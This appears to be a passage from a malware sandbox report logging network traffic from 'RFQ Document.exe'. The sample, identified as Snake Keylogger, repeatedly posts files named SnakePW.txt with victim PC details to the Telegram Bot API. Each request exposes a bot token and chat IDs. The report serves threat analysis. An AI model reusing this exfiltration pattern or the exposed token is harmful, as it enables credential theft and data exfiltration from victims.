                                            2021-09-28 05:58:35 UTC102OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 61 65 31 32 36 30 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255cae1260cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:35 UTC103INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:35 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:35 UTC103INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 34 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 35 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12646,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808715,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            65192.168.2.449841149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:36 UTC103OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255cafdc418
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:36 UTC104OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 61 66 64 63 34 31 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255cafdc418Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:36 UTC104INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:36 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:36 UTC105INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 34 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 36 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12647,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808716,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            66192.168.2.449842149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:36 UTC105OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255cb159961
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:36 UTC105OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 62 31 35 39 39 36 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255cb159961Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:36 UTC106INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:36 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:36 UTC106INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 34 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 36 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12648,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808716,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            67192.168.2.449843149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:36 UTC107OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255cb2d737b
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:36 UTC107OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 62 32 64 37 33 37 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255cb2d737bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:36 UTC107INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:36 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:36 UTC108INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 34 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 36 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12649,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808716,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            68192.168.2.449844149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:36 UTC108OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255cb4a0dfe
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:36 UTC109OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 62 34 61 30 64 66 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255cb4a0dfeContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:36 UTC109INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:36 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:36 UTC109INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 35 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 36 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12650,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808716,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            69192.168.2.449845149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:36 UTC110OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255cb61e4d0
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:36 UTC110OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 62 36 31 65 34 64 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255cb61e4d0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:36 UTC111INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:36 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:36 UTC111INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 35 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 36 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12651,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808716,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            7192.168.2.449781149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:22 UTC10OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c2af12f7
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:22 UTC11OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 32 61 66 31 32 66 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c2af12f7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:22 UTC11INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:22 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:22 UTC12INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 35 38 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 32 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12586,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808702,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            70192.168.2.449846149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:36 UTC112OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255cb79bc6f
                                            Host: api.telegram.org
                                            Content-Length: 407
